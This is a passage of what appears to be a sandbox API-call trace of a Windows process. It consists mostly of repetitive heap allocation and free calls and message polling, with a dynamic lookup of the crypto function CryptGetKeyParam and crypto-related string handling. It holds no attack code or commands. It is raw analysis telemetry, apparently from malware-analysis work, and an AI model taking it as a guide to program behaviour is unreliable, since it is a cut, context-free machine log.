hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.267] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0042.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae948 [0042.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae948, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.273] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.273] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0042.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.274] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.274] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.275] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.275] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.275] PeekMessageW (in: lpMsg=0x6ae83c, 